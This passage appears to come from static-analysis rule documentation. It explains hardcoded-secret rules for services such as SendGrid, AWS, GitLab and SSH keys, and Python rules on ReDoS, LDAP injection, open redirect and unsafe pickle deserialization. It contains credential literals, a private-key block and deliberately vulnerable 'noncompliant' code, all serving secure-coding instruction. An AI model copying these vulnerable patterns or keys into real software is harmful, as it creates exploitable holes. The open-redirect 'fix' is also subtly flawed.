When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.

In addition to secure storage, it’s important to apply restrictions to API keys in order to mitigate the impacts when they are discovered by malicious actors.

Resources

secrets:S6696

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

SendGrid keys are used for authentication and authorization when using the SendGrid email delivery service.

If a SendGrid key were to accidentally fall into the hands of unintended recipients, it could have severe repercussions for your email delivery.

Firstly, unauthorized individuals who gain access to your SendGrid account could exploit its features to send emails on your behalf. This unauthorized access might result in the sending of spam emails, phishing attempts, or other forms of unsolicited and potentially harmful content. This not only compromises the integrity of your email communications but also poses a risk to the recipients who may unknowingly engage with malicious messages.

Secondly, the leaked SendGrid key could trigger a high volume of email activity, potentially raising suspicions. SendGrid, being vigilant about such activities, may flag your account and take action against it. This could lead to the suspension or termination of your SendGrid account, disrupting your email delivery service and causing significant inconvenience and potential loss of communication with your customers or clients.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("sg_key", "SG.Wjo5QoWqTmrFtMUf8m2T.CIY0Z24e5sJawIymiK_ZKC_7I15yDP0ur1yt0qtkR9Go")

Compliant solution

props.set("sg_key", System.getenv("SG_KEY"))

Resources

Standards

Documentation

secrets:S6699

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

The Spotify API secret is a confidential key used for authentication and authorization purposes when accessing the Spotify API.

The Spotify API grants applications access to Spotify’s services and, by extension, user data. Should this secret fall into the wrong hands, two immediate concerns arise: unauthorized access to user data and data manipulation.

When unauthorized entities obtain the API secret, they have potential access to users' personal Spotify information. This includes the details of their playlists, saved tracks, and listening history. Such exposure might not only breach personal boundaries but also infringe upon privacy standards set by platforms and regulators.

In addition to simply gaining access, there is the risk of data manipulation. If malicious individuals obtain the secret, they could tamper with user content on Spotify. This includes modifying playlists, deleting beloved tracks, or even adding unsolicited ones. Such actions not only disrupt the user experience but also violate the trust that users have in both Spotify and third-party applications connected to it.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("spotify_secret", "f3fbd32510154334aaf0394aca3ac4c3")

Compliant solution

props.set("spotify_secret", System.getenv("SPOTIFY_SECRET"))

Resources

Standards

secrets:S6336

Why is this an issue?

AccessKeys are long term credentials designed to authenticate and authorize requests to Alibaba Cloud.

If your application interacts with Alibaba Cloud then it requires AccessKeys to access all the resources it needs to function properly. Resources that can be accessed depend on the permissions granted to the Alibaba Cloud account. These credentials may authenticate to the account root user who has unrestricted access to all resources in your Alibaba Cloud account, including billing information.

This rule flags instances of:

  • Alibaba Cloud AccessKey ID
  • Alibaba Cloud AccessKey secret

Recommended Secure Coding Practices

Only administrators should have access to the AccessKeys used by your application.

As a consequence, AccessKeys should not be stored along with the application code as they would grant special privilege to anyone who has access to the application source code.

AccessKeys should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On AlibabaCloud this service is called Secrets Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.

Resources

secrets:S6698

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Passwords in PostgreSQL are used to authenticate users against the database engine. They are associated with user accounts that are granted specific permissions over the database and its hosted data.

If a PostgreSQL password leaks to an unintended audience, it can have serious consequences for the security of your database, the data stored within it, and the applications that rely on it.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

Security downgrade

Applications relying on a PostgreSQL database instance can suffer a security downgrade if an access password is leaked to attackers. Depending on the purposes the application uses the database for, consequences can range from low-severity issues, like defacement, to complete compromise.

For example, if the PostgreSQL instance is used as part of the authentication process of an application, attackers with access to the database will likely be able to bypass this security mechanism.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

By default, no connection information is logged by PostgreSQL server. The log_connections parameter must be set to true in the server configuration for this to happen.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

uri = "postgres://foouser:foopass@example.com/testdb"

Compliant solution

import os

user = os.environ["PG_USER"]
password = os.environ["PG_PASSWORD"]
uri = f"postgres://{user}:{password}@example.com/testdb"

Resources

Standards

Documentation

secrets:S6335

Why is this an issue?

Google Cloud service accounts are designed to authenticate and authorize requests to Google APIs.

If your application interacts with Google Cloud services then it requires a service account to access all the resources it needs to function properly. Resources that can be accessed depend on the permission granted to the service account. Establishing the identity of a service account relies on a public/private key pair. It’s common for private keys to be distributed through a JSON file that your application will then use to consume Google APIs.

A key may authenticate to a high privilege which has unrestricted access to all resources in your Google Cloud project, including billing information.

Recommended Secure Coding Practices

Only administrators should have access to the service account key used by your application.

As a consequence, service account keys should not be stored along with the application code as they would grant special privileges to anyone who has access to the application source code.

Keys should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On Google Cloud this service is called Secret Manager.

When keys are disclosed in the application code, consider them as compromised and revoke them immediately.

Resources

secrets:S6290

Why is this an issue?

AWS credentials are designed to authenticate and authorize requests to AWS.

If your application interacts with AWS then it requires AWS credentials to access all the resources it needs to function properly. Resources that can be accessed depend on the permission granted to the AWS account. These credentials may authenticate to the AWS account root user who has unrestricted access to all resources in your AWS account, including billing information.

This rule flags instances of:

  • AWS Secret Access Key
  • AWS Access ID
  • AWS Session Token

Recommended Secure Coding Practices

Only administrators should have access to the AWS credentials used by your application.

As a consequence, AWS credentials should not be stored along with the application code as they would grant special privilege to anyone who has access to the application source code.

Credentials should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On AWS this service is called Secrets Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.

Resources

secrets:S6693

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

SSH private keys are used for authentication and secure communication in SSH (Secure Shell) protocols. They are a form of asymmetric cryptography, where a pair of keys is generated: a private key and a corresponding public key. SSH keys provide a secure and efficient way to authenticate and establish secure connections between clients and servers. They are widely used for remote login, file transfer, and secure remote administration.

When an SSH private key is leaked to an unintended audience, it can have severe consequences for security and confidentiality. One of the primary outcomes is unauthorized access. The unintended audience can exploit the leaked private key to authenticate themselves as the legitimate owner, gaining unauthorized entry to systems, servers, or accounts that accept the key for authentication. This unauthorized access opens the door for various malicious activities, including data breaches, unauthorized modifications, and misuse of sensitive information.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Depending on the information system the key is used to authenticate against, the audit method might change. For example, on Linux systems, the system-wide authentication logs could be used to audit recent connections from an affected account.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

String key = """
    -----BEGIN OPENSSH PRIVATE KEY-----
    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
    QyNTUxOQAAACDktj2RM1D2wRTQ0H+YZsFqnAuZrqBNEB4PpJ5xm73nWwAAAJgJVPFECVTx
    RAAAAAtzc2gtZWQyNTUxOQAAACDktj2RM1D2wRTQ0H+YZsFqnAuZrqBNEB4PpJ5xm73nWw
    AAAECQ8Nzp6a1ZJgS3SWh2pMxe90W9tZVDZ+MZT35GjCJK2uS2PZEzUPbBFNDQf5hmwWqc
    C5muoE0QHg+knnGbvedbAAAAFGdhZXRhbmZlcnJ5QFBDLUwwMDc3AQ==
    -----END OPENSSH PRIVATE KEY-----""";

Compliant solution

String key = System.getenv("SSH_KEY");

Resources

Standards

secrets:S6692

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A reCaptcha secret key is a unique token that is used to verify the authenticity of reCaptcha requests made from an application to the reCaptcha service. It is a key component in ensuring CAPTCHAs challenges issued by the application are properly solved and verified.

If a reCaptcha secret key leaks to an unintended audience, attackers with access to it will be able to forge CAPTCHA responses without solving them. It will allow them to bypass the CAPTCHA challenge verification.

This can lead to an influx of spam submissions, automated attacks, or unauthorized access attempts depending on the feature the CAPTCHA mechanism is intended to protect.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("recaptcha_secret", "6LcaQa4mAAAAAFvhmzAd2hErGBSt4FC")

Compliant solution

props.set("recaptcha_secret", System.getenv("RECAPTCHA_SECRET"))

Resources

Standards

Documentation

secrets:S6695

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

WeChat application keys are used for authentication and authorization purposes when integrating third-party applications with the WeChat platform.

If a WeChat app key were to leak to an unintended audience, it could have severe consequences for both the app developer and the app users. The unauthorized individuals or malicious actors who gain access to the app key would have the potential to exploit it in various ways.

One of the primary risks is the unauthorized access to sensitive user data associated with the WeChat app. This could include personal information, chat logs, and other private data that users have shared on the platform. The leaked app key could provide a gateway for unauthorized individuals to access and misuse this data, compromising the privacy and security of WeChat users.

Another significant concern is the potential for impersonation and unauthorized actions. With the leaked app key, malicious actors could impersonate the app and perform actions on behalf of the app without proper authorization. This could lead to various security breaches, such as sending spam messages, spreading malware, or conducting phishing attacks on unsuspecting WeChat users.

Furthermore, the leaked app key could enable unauthorized parties to manipulate or disrupt the functionality of the WeChat app. They could tamper with app settings, inject malicious code, or even take control of the app’s user base. Such actions could result in a loss of user trust, service disruptions, and reputational damage for both the app developer and the WeChat platform.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("secret_key", "40b6b70508b47cbfb4ee39feb617a05a")

Compliant solution

props.set("secret_key", System.getenv("SECRET_KEY"))

Resources

Standards

secrets:S6694

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Passwords in MongoDB are used to authenticate users against the database engine. They are associated with user accounts that are granted specific permissions over the database and its hosted data.

If a MongoDB password leaks to an unintended audience, it can have serious consequences for the security of your database, the data stored within it, and the applications that rely on it.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

Security downgrade

Applications relying on a MongoDB database instance can suffer a security downgrade if an access password is leaked to attackers. Depending on the purposes the application uses the database for, consequences can range from low-severity issues, like defacement, to complete compromise.

For example, if the MongoDB instance is used as part of the authentication process of an application, attackers with access to the database will likely be able to bypass this security mechanism.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

MongoDB instances maintain a log that includes user authentication events. This one could be used to audit recent malicious connections.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

uri = "mongodb://foouser:foopass@example.com/testdb"

Compliant solution

import os

user = os.environ["MONGO_USER"]
password = os.environ["MONGO_PASSWORD"]
uri = f"mongodb://{user}:{password}@example.com/testdb"

Resources

Standards

Documentation

secrets:S6292

Why is this an issue?

Amazon Marketplace Web Service credentials are designed to authenticate and authorize Amazon sellers.

If your application interacts with Amazon MWS then it requires credentials to access all the resources it needs to function properly. The credentials authenticate to a seller account which can have access to resources like products, orders, price or shipment information.

Recommended Secure Coding Practices

Only administrators should have access to the MWS credentials used by your application.

As a consequence, MWS credentials should not be stored along with the application code as they would grant special privilege to anyone who has access to the application source code.

Credentials should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On AWS this service is called Secrets Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.

Resources

secrets:S6691

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A Google client OAuth secret is a confidential string that is used to authenticate and authorize applications when they interact with Google APIs. It is a part of the OAuth 2.0 protocol, which allows applications to access user data on their behalf.

The client secret is used in the OAuth flow to verify the identity of the application and ensure that only authorized applications can access user data. It is typically used in combination with a client ID, which identifies the application itself.

If a Google client OAuth secret leaks to an unintended audience, it can have serious security implications. Attackers who obtain the client secret can use it to impersonate the application and gain unauthorized access to user data. They can potentially access sensitive information, modify data, or perform actions on behalf of the user without their consent.

The exact capabilities of the attackers will depend on the authorizations the corresponding application has been granted.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Google Cloud console provides a Logs Explorer feature that can be used to audit recent access to a cloud infrastructure.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("client_secret", "TgxYWFmND-1NTYwNTgzMDM3N")

Compliant solution

props.set("client_secret", System.getenv("CLIENT_SECRET"))

Resources

Standards

Documentation

secrets:S6690

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

GitLab tokens are used for authentication and authorization purposes. They are essentially access credentials that allow users or applications to interact with the GitLab API.

With a GitLab token, you can perform various operations such as creating, reading, updating, and deleting resources like repositories, issues, merge requests, and more. Tokens can also be scoped to limit the permissions and actions that can be performed.

A leaked GitLab token can have significant consequences for the security and integrity of the associated account and resources. It exposes the account to unauthorized access, potentially leading to data breaches and malicious actions. The unintended audience can exploit the leaked token to gain unauthorized entry into the GitLab account, allowing them to view, modify, or delete repositories, issues, and other resources. This unauthorized access can result in the exposure of sensitive data, such as proprietary code, customer information, or confidential documents, leading to potential data breaches.

Moreover, the unintended audience can perform malicious actions within the account, introducing vulnerabilities, injecting malicious code, or tampering with settings. This can compromise the security of the account and the integrity of the software development process.

Additionally, a leaked token can enable the unintended audience to take control of the GitLab account, potentially changing passwords, modifying settings, and adding or removing collaborators. This account takeover can disrupt development and collaboration workflows, causing reputational damage and operational disruptions.

Furthermore, the impact of a leaked token extends beyond the immediate account compromise. It can have regulatory and compliance implications, requiring organizations to report the breach, notify affected parties, and potentially face legal and financial consequences.

In general, the compromise of a GitLab token would lead to consequences referred to as supply chain attacks that can affect more than one’s own organization.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes is using it. Other usages of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will allow determining if an attacker took advantage of the leaked secret and to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("token", "glpat-zcs1FfaxGnHfvzd7ExHz")

Compliant solution

props.set("token", System.getenv("TOKEN"))

Resources

Standards

pythonsecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression search engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to performance problems also referred to as catastrophic backtracking situations.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Python Standard Library

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service (ReDoS) because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

from flask import request
import re

@app.route('/lookup')
def lookup():
  regex = request.args['regex']
  data = request.args['data']

  re.search(regex, data) # Noncompliant

Compliant solution

from flask import request
import re

@app.route('/lookup')
def lookup():
  regex = request.args['regex']
  data = request.args['data']

  re.search(re.escape(regex), data)

How does this work?

Sanitization and Validation

Metacharacters escape using native functions is a solution against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important Note: The application must sanitize and validate on the server side. Not on client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution, re.escape escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

pythonsecurity:S2078

Why is this an issue?

LDAP injections occur in an application when the application retrieves untrusted data and inserts it into an LDAP query without sanitizing it first.

An LDAP injection can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the malicious request on the application is not a barrier to exploitation. Thus, it must be treated the same way as basic LDAP injections.

What is the potential impact?

In the context of a web application vulnerable to LDAP injection: after discovering the injection point, attackers insert data into the vulnerable field to execute malicious LDAP commands.

The impact of this vulnerability depends on how vital LDAP servers are to the organization.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data leakage or corruption

In typical scenarios where systems perform innocuous LDAP operations to find users or create inventories, an LDAP injection could result in data leakage or corruption.

Privilege escalation

A malicious LDAP query could allow an attacker to impersonate a low-privileged user or an administrator in scenarios where systems perform authorization checks or authentication.

Attackers use this vulnerability to find multiple footholds on target organizations by gathering authentication bypasses.

How to fix it in python-ldap

Code examples

The following noncompliant code is vulnerable to LDAP injection because untrusted data is concatenated to an LDAP query without prior sanitization or validation.

Noncompliant code example

from flask import request
import ldap

@app.route("/user")
def user():
    username =  request.args['username']

    search_filter = "(&(objectClass=user)(uid="+username+"))"

    ldap_connection = ldap.initialize("ldap://localhost:389")
    user = ldap_connection.search_s("dc=example,dc=org", ldap.SCOPE_SUBTREE, search_filter) # Noncompliant

    return user[0]

Compliant solution

from flask import request
import ldap

@app.route("/user")
def user():
    username = ldap.filter.escape_filter_chars(request.args['username'])

    search_filter = "(&(objectClass=user)(uid="+username+"))"

    ldap_connection = ldap.initialize("ldap://localhost:389")
    user = ldap_connection.search_s("dc=example,dc=org", ldap.SCOPE_SUBTREE, search_filter)

    return user[0]

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For LDAP injection, the cleanest way to do so is to use parameterized queries if it is available for your use case.

Another approach is to sanitize the input before using it in an LDAP query. Input sanitization should be primarily done using native libraries.

Alternatively, validation can be implemented using an allowlist approach by creating a list of authorized and secure strings you want the application to use in a query. If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must sanitize and validate on the server-side. Not on client-side front-ends.

The most fundamental security mechanism is the restriction of LDAP metacharacters.

For Distinguished Names (DN), special characters that need to be escaped include:

  • \
  • #
  • +
  • <
  • >
  • ,
  • ;
  • "
  • =

For Search Filters, special characters that need to be escaped include:

  • *
  • (
  • )
  • \
  • null

For Python, the python-ldap library functions escape_filter_chars and escape_dn_chars allow sanitizing these characters.

In the compliant solution example, the escape_filter_chars is used to sanitize the search filter concatenated input.

Resources

Standards

pythonsecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to his evil domain.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. Often, it requires an attacker to build a credible pretext to prevent suspicions from the victim.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of his choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker’s controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application appearance and the apparently trustable clicked hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Flask

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

from flask import Flask, redirect

app = Flask("example")

@app.route("/redirecting")
def redirecting():
    url = request.args["url"]
    return redirect(url) # Noncompliant

Compliant solution

from flask import Flask, redirect, url_for

app = Flask("example")

@app.route("/redirecting")
def redirecting():
    url = request.args["url"]
    return redirect(url_for(url))

How does this work?

Built-in framework methods should be preferred as, more often than not, these provide additional security mechanisms. Usually, these built-in methods are engineered for internal page redirections. Thus, they might not be the solution for the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.

Resources

Standards

pythonsecurity:S5135

Why is this an issue?

Deserialization injections occur when applications deserialize wholly or partially untrusted data without verification.

What is the potential impact?

In the context of a web application performing unsafe deserialization:
After detecting the injection vector, attackers inject a carefully-crafted payload into the application.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting an object of the expected class, but with malicious properties that affect the object’s behavior.

If the application relies on the properties of the deserialized object, attackers can modify the data structure or content to escalate privileges or perform unwanted actions.
In the context of an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object of a completely different class than expected, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate his privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Python Standard Library

Code examples

The following code is vulnerable to deserialization attacks because it deserializes HTTP data without validating it first.

Noncompliant code example

def unsafe():
    objstr = b64decode(request.args.get("object"))
    obj = pickle.loads(objstr)
    return str(obj.status == "OK")

Compliant solution

def safe():
    obj = json.loads(request.args.get("object"))
    return str(obj["status"] == "OK")

How does this work?

